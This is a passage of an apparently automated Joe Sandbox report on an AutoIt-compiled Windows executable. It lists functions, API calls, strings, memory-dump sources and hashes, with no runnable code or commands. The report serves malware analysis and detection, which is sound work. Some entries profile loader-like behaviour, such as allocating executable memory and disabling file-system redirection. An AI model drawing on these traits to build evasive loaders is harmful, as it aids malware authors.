                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                  • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                  • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                                                                                  • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                  • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                                                                                  Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                                                                                  • __swprintf.LIBCMT ref: 00412ECD
                                                                                                                                                  Strings
                                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                                  • Opcode ID: 4f3edc8c56bf39c30857d576500cd0c87af0552594f6f6b8e0efc7254c5b9edb
                                                                                                                                                  • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                                                                                  • Opcode Fuzzy Hash: 4f3edc8c56bf39c30857d576500cd0c87af0552594f6f6b8e0efc7254c5b9edb
                                                                                                                                                  • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                                                                                  Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContainedObject
                                                                                                                                                  • String ID: AutoIt3GUI$Container$%I
                                                                                                                                                  • API String ID: 3565006973-4251005282
                                                                                                                                                  • Opcode ID: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
                                                                                                                                                  • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                                                                                  • Opcode Fuzzy Hash: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
                                                                                                                                                  • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                                                                                  Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                                                                                    • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                                                  • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                  • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                                                                                  • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                  • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                                                                                  Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID: 3cA$_A
                                                                                                                                                  • API String ID: 4104443479-3480954128
                                                                                                                                                  • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                  • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                                                                                  • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                  • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                                                                                  Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                  • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                  • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                                                                                  • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                  • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                                                                                  Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                  • String ID: Listbox
                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                  • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                  • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                                                                                  • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                  • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                                                                                  Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                  • String ID: K$@BL
                                                                                                                                                  • API String ID: 3494438863-2209178351
                                                                                                                                                  • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                  • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                                                                                  • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                  • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                                                                                  Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                                  • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                  • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                                                                                  • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                  • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                                                                                  Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                                  • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                  • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                                                                                  • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                  • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                                                                                  Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                                  • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                  • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                                                                                  • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                  • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                                                                                  Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                                                  • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                  • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                                                                                  • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                  • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                                                                                  Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                  • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                                                                                  • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                  • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                                                                                  Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                                                                                    • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                                                                                  • _memmove.LIBCMT ref: 0047E314
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
